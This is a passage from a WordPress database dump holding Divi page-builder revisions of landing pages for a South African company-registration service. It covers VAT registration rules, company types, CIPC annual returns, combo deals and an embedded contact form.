amongst others, individuals, partnerships, trust funds, foreign donor funded projects and municipalities.</p>\n<p>It is<span> </span><span>mandatory</span><span> </span>for a person to register for VAT if sales made from selling goods or services is in excess of R1 million in any consecutive twelve month period.</p>[/et_pb_toggle][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\"][et_pb_cta title=\"Combo Deals\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"0px||||false|false\" custom_padding=\"20px|5px|4px|5px|false|false\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/maintaining-your-company\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" header_letter_spacing=\"2px\" header_text_color__hover=\"#ffffff\" header_text_color__hover_enabled=\"on\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" background_color__hover=\"rgba(196,13,126,0.64)\" background_enable_color=\"off\" background_enable_color__hover=\"on\" background__hover_enabled=\"on\"][/et_pb_cta][et_pb_toggle title=\"View More\" _builder_version=\"3.26.6\" custom_margin=\"-41px||||false|false\"]<p><b>Each Company Is Unique In Its Own Right</b></p>\n<p><b></b></p>\n<p>Customize your package and save <span style=\"color: #ff00ff;\">BIG</span></p>[/et_pb_toggle][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.26.6\"][et_pb_row column_structure=\"2_3,1_3\" _builder_version=\"3.26.6\" width=\"89%\" max_width=\"1490px\" module_alignment=\"center\" custom_margin=\"|217px||221px||\"][et_pb_column type=\"2_3\" _builder_version=\"3.26.6\"][et_pb_shop type=\"product_category\" posts_number=\"6\" include_categories=\"8,7,17\" columns_number=\"3\" _builder_version=\"3.26.6\"][/et_pb_shop][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.26.6\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/app-developer-illustration-small-03-1.png\" _builder_version=\"3.26.6\" width=\"100%\" max_width=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section]','Landing style 2','','inherit','closed','closed','','31906-revision-v1','','','2019-08-15 15:40:57','2019-08-15 13:40:57','',31906,'https://companyregistration.online/31906-revision-v1/',0,'revision','',0),(32817,3,'2019-08-15 15:38:27','2019-08-15 13:38:27','[et_pb_section fb_built=\"1\" inner_shadow=\"on\" _builder_version=\"3.26.3\" background_image=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" background_size=\"contain\" background_repeat=\"repeat-y\" custom_padding=\"3px|0px|0px|0px\" top_divider_style=\"wave2\" top_divider_color=\"rgba(0,0,0,0)\" top_divider_height=\"46px\" top_divider_flip=\"horizontal\" animation_style=\"zoom\"][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Flags\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.26.3\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"10px|0px|0px|0px\" make_fullwidth=\"on\" locked=\"off\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" background_position=\"top_left\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.26.3\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2000ms\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" background_position=\"top_left\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" align=\"right\" align_tablet=\"center\" align_last_edited=\"on|desktop\" disabled_on=\"on|on|off\" _builder_version=\"3.26.3\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2500ms\" animation_delay=\"200ms\" animation_starting_opacity=\"8%\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.24\" background_color=\"#ffffff\" parallax=\"on\" custom_padding=\"20px|0px|1px|0px|false|false\"][et_pb_row module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px|0px|0px|0px\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_tabs active_tab_background_color=\"#7cda24\" inactive_tab_background_color=\"#e8e8e8\" _builder_version=\"3.24\" tab_font=\"|700|||||||\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.16)\" background_color_gradient_direction=\"179deg\" background_color_gradient_start_position=\"37%\" border_radii=\"on|10px|10px|10px|10px\" box_shadow_style=\"preset2\" animation_style=\"fold\" animation_direction=\"bottom\" animation_duration=\"1200ms\" animation_delay=\"100ms\"][et_pb_tab title=\"One stop\" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\"]<h3 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>All the registrations you require to get your company compliant and ready for business anywhere in <span style=\"font-size: x-large;\"><span style=\"color: #154907;\">S</span><span style=\"color: #e09900;\">o<span style=\"color: #184c0d;\">u</span><span style=\"color: #e02b20;\">t</span><span style=\"color: #0c71c3;\">h</span> <span style=\"color: #000000;\">A</span>f<span style=\"color: #195e10;\">r</span><span style=\"color: #e02b20;\">i</span><span style=\"color: #0c71c3;\">c</span><span style=\"color: #000000;\">a</span></span></span></strong></span></h3>\r[/et_pb_tab][et_pb_tab title=\"For Tenders\" _builder_version=\"3.2.1\" body_font=\"||||\" tab_font=\"Abel||||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4><strong><span style=\"font-family: Abel;\">Get all the registrations documents<a href=\"https://companyregistration.online/shop/combo-deals/tender-ready/\" target=\"_blank\" rel=\"noopener noreferrer\" title=\"Tender Ready\"> <span style=\"color: #993366;\">for your tender</span> </a>fast tracked and professionally done so that no opportunity is missed.</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Secure Payment Gateway\" _builder_version=\"3.24\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">We use a trusted South African payment gateway. No credit card information is maintained on our site. The payment gateway is a member of the Payments Association of South Africa (PASA)?</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Simple process\" _builder_version=\"3.24\" body_font=\"||||||||\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">Purchase the service, complete the form, if applicable, submit supporting documentation and RELAX, you done, all from your arm chair.</span></strong></h4>\n<p style=\"text-align: center;\"><span style=\"color: #333399;\"><strong><span style=\"font-family: Abel;\">PROFESSIONAL,SIMPLE &amp; CONVENIENT</span></strong></span></p>[/et_pb_tab][et_pb_tab title=\"Professional Service\" _builder_version=\"3.2.1\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>We advise you on the appropriate company to register and keep you informed all the way until the work process is complete or registered . We will also facilitate the opening of the business bank account anywhere in South Africa<br /> </strong></span></h4>[/et_pb_tab][et_pb_tab title=\"Visit Blog/FAQs \" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\"><span style=\"color: #0c71c3;\"><a href=\"https://companyregistration.online/category/faqs/\" style=\"color: #0c71c3;\">Valuable information</a></span> about the right company to register, consequences of deregistration, difference between CIPC Annual Return and AnnualTax Return, etc</span></strong></h4>[/et_pb_tab][/et_pb_tabs][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.26.6\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"3.26.6\"][et_pb_column type=\"1_2\" _builder_version=\"3.26.6\"][et_pb_divider show_divider=\"off\" _builder_version=\"3.26.6\" height=\"125px\"][/et_pb_divider][et_pb_text _builder_version=\"3.26.6\" text_font=\"|700|||||||\" header_font=\"|700|||||||\" header_text_align=\"center\" header_font_size=\"47px\"]<h1 style=\"text-align: center;\">What Would You Like To Do ?</h1>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.26.6\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/working-free-img.jpg\" _builder_version=\"3.26.6\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" _builder_version=\"3.26.6\" width=\"98%\" max_width=\"1347px\" module_alignment=\"center\" custom_margin=\"|223px||427px||\"][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\"][et_pb_cta title=\"Register A Company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" header_letter_spacing=\"2px\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"0px||||false|false\" custom_padding=\"20px|5px|4px|5px|false|false\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/company-registrations/\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" background__hover_enabled=\"on\" background_enable_color=\"off\" background_color__hover=\"rgba(196,13,126,0.64)\" background_enable_color__hover=\"on\" header_text_color__hover_enabled=\"on\" header_text_color__hover=\"#ffffff\"][/et_pb_cta][et_pb_toggle title=\"View More\" _builder_version=\"3.26.6\" custom_margin=\"-41px||||false|false\"]<p><strong>What type of companies that can be registered</strong><span> </span>in terms of the New Companies Act 71, 2008</p>\n<ul>\n<li>Private company (Pty) Ltd</li>\n<li>Public company (Ltd)</li>\n<li>State-owned company (SOC)</li>\n<li>External company</li>\n<li>Personal liability company (Inc)</li>\n<li>Non-profit company (NPC)</li>\n</ul>[/et_pb_toggle][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\"][et_pb_cta title=\"Maintain My Company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"0px||||false|false\" custom_padding=\"20px|5px|4px|5px|false|false\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/maintaining-your-company/\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" header_letter_spacing=\"2px\" header_text_color__hover=\"#ffffff\" header_text_color__hover_enabled=\"on\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" background_color__hover=\"rgba(196,13,126,0.64)\" background_enable_color=\"off\" background_enable_color__hover=\"on\" background__hover_enabled=\"on\"][/et_pb_cta][et_pb_toggle title=\"View More\" _builder_version=\"3.26.6\" custom_margin=\"-41px||||false|false\"]<p><span>All companies (including external companies) and close corporations are required by law to file their annual returns with the CIPC on an annual basis, within a prescribed time period. The purpose for the filing of such annual returns is to confirm whether a company or close corporation is still in business/trading, or if it will be in business in the near future.</span></p>[/et_pb_toggle][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\"][et_pb_cta title=\"Register For Tax\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"0px||||false|false\" custom_padding=\"20px|5px|4px|5px|false|false\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/tax-registrations\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" header_letter_spacing=\"2px\" header_text_color__hover=\"#ffffff\" header_text_color__hover_enabled=\"on\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" background_color__hover=\"rgba(196,13,126,0.64)\" background_enable_color=\"off\" background_enable_color__hover=\"on\" background__hover_enabled=\"on\"][/et_pb_cta][et_pb_toggle title=\"View More\" _builder_version=\"3.26.6\" custom_margin=\"-41px||||false|false\"]<p>Any person that carries on a business may register for VAT. The term person is not only limited to companies but also includes, amongst others, individuals, partnerships, trust funds, foreign donor funded projects and municipalities.</p>\n<p>It is<span> </span><span>mandatory</span><span> </span>for a person to register for VAT if sales made from selling goods or services is in excess of R1 million in any consecutive twelve month period.</p>[/et_pb_toggle][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\"][et_pb_cta title=\"Combo Deals\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"0px||||false|false\" custom_padding=\"20px|5px|4px|5px|false|false\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/maintaining-your-company\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" header_letter_spacing=\"2px\" header_text_color__hover=\"#ffffff\" header_text_color__hover_enabled=\"on\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" background_color__hover=\"rgba(196,13,126,0.64)\" background_enable_color=\"off\" background_enable_color__hover=\"on\" background__hover_enabled=\"on\"][/et_pb_cta][et_pb_toggle title=\"View More\" _builder_version=\"3.26.6\" custom_margin=\"-41px||||false|false\"]<p><b>Each Company Is Unique In Its Own Right</b></p>\n<p><b></b></p>\n<p>Customize your package and save <span style=\"color: #ff00ff;\">BIG</span></p>[/et_pb_toggle][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.26.6\"][et_pb_row column_structure=\"2_3,1_3\" _builder_version=\"3.26.6\" width=\"89%\" max_width=\"1490px\" module_alignment=\"center\" custom_margin=\"|217px||221px||\"][et_pb_column type=\"2_3\" _builder_version=\"3.26.6\"][et_pb_shop type=\"product_category\" posts_number=\"6\" include_categories=\"8,7,17\" columns_number=\"3\" _builder_version=\"3.26.6\"][/et_pb_shop][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.26.6\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/app-developer-illustration-small-03-1.png\" _builder_version=\"3.26.6\" width=\"100%\" max_width=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.22.3\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.12)\" background_color_gradient_type=\"radial\" background_color_gradient_start_position=\"75%\" custom_padding=\"7px|0px|6px|0px\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"28px|0px|4px|0px\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.0.89\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\">Other Registration Categories</span></strong></span></h1>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text disabled_on=\"on|on|off\" _builder_version=\"3.3.1\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\">Combo Deals<br /></span></strong></span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_4,1_4\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/product-category/tax-registration/\" use_icon=\"on\" font_icon=\"%%155%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"Tax Registration\" _builder_version=\"3.0.87\" header_font=\"Abel|on||on|\" border_radii=\"on|10px|10px|10px|10px\" custom_padding=\"25px|10px|10px|10px\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h4 style=\"text-align: center;\"><a href=\"https://companyregistration.online/product-category/tax-registration/\">Tax Registration</a></h4>\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"combo deals\" _builder_version=\"3.2.1\" custom_padding=\"25px||80px|\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1200ms\" animation_delay=\"450ms\" inline_fonts=\"Abel\"]<h2 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; color: #c10097;\"><strong><a href=\"https://companyregistration.online/combo-services/\">Save by getting a combo of services here</a><br />\r\n</strong></span><a href=\"https://companyregistration.online/combo-services/\" rel=\"https://companyregistration.online/pricing-table/\"><img class=\"alignright wp-image-28359\" src=\"https://companyregistration.online/wp-content/uploads/2016/03/advance1600-300x300.png\" alt=\"\" width=\"103\" height=\"103\" /></a></h2>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/combo-services/\" use_icon=\"on\" font_icon=\"%%151%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"Combo Savings\" _builder_version=\"3.0.89\" header_font=\"Abel|on||on|\" border_radii=\"on|10px|10px|10px|10px\" custom_padding=\"25px|10px|10px|10px\" animation_style=\"slide\" animation_direction=\"right\" animation_delay=\"750ms\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h4 style=\"text-align: center;\"><a href=\"https://companyregistration.online/combo-services/\">Combo Savings</a></h4>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section]','Landing style 2','','inherit','closed','closed','','31906-revision-v1','','','2019-08-15 15:38:27','2019-08-15 13:38:27','',31906,'https://companyregistration.online/31906-revision-v1/',0,'revision','',0),(32822,3,'2019-08-15 16:06:10','2019-08-15 14:06:10','[et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Call to Action\" _builder_version=\"3.26.6\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#edf8ff\" custom_padding=\"||\" custom_padding_tablet=\"|0vw|30vw|\" bottom_divider_color=\"#ffffff\" bottom_divider_height=\"24vw\" bottom_divider_repeat=\"0.6x\" bottom_divider_flip=\"vertical|horizontal\" bottom_divider_arrangement=\"above_content\" locked=\"off\" width=\"93%\" module_alignment=\"center\" template_type=\"section\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"2\" _builder_version=\"3.25\" width=\"100%\" max_width=\"100%\" use_custom_width=\"on\" width_unit=\"off\" custom_width_percent=\"100%\" column_structure=\"1_2,1_2\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.26.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" header_2_font=\"Poppins|600|||||||\" header_2_font_size=\"32px\" header_2_line_height=\"1.6em\" max_width=\"700px\" header_2_font_size_tablet=\"24px\" header_2_font_size_phone=\"18px\" header_2_font_size_last_edited=\"on|phone\" locked=\"off\" header_2_text_align=\"center\" text_font_size=\"21px\"]<h2>Not Exactly Sure What To Do?</h2>\n<p style=\"text-align: center;\">Fill our contact form and a consultant will get contact you to better discuss what services your company requires</p>[/et_pb_text][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/app-19.png\" show_bottom_space=\"off\" _builder_version=\"3.23\" max_width_tablet=\"400px\" max_width_last_edited=\"on|tablet\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"1%\" always_center_on_mobile=\"off\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|10vw||\" custom_padding_tablet=\"|10vw||10vw||true\" custom_padding_last_edited=\"on|tablet\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.26.6\"]<iframe frameborder=\"0\" style=\"height: 720px; width: 99%; border: none;\" src=\"https://forms.zohopublic.com/mawincnetwork/form/ContactForm/formperma/mgyNovoEJpAyVGAXfwsVHV_TgNG-DKU904Sz1B2Verw\"></iframe>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','contact us form','','publish','closed','closed','','contact-us-form','','','2019-08-15 16:06:10','2019-08-15 14:06:10','',0,'https://companyregistration.online/et_pb_layout/contact-us-form/',0,'et_pb_layout','',0),(32827,3,'2019-08-15 16:18:10','2019-08-15 14:18:10','[et_pb_section fb_built=\"1\" inner_shadow=\"on\" _builder_version=\"3.26.3\" background_image=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" background_size=\"contain\" background_repeat=\"repeat-y\" custom_padding=\"3px|0px|0px|0px\" top_divider_style=\"wave2\" top_divider_color=\"rgba(0,0,0,0)\" top_divider_height=\"46px\" top_divider_flip=\"horizontal\" animation_style=\"zoom\"][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Flags\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.26.3\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"10px|0px|0px|0px\" make_fullwidth=\"on\" locked=\"off\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" background_position=\"top_left\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.26.3\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2000ms\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" background_position=\"top_left\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" align=\"right\" align_tablet=\"center\" align_last_edited=\"on|desktop\" disabled_on=\"on|on|off\" _builder_version=\"3.26.3\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2500ms\" animation_delay=\"200ms\" animation_starting_opacity=\"8%\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.24\" background_color=\"#ffffff\" parallax=\"on\" custom_padding=\"20px|0px|1px|0px|false|false\"][et_pb_row module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px|0px|0px|0px\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" 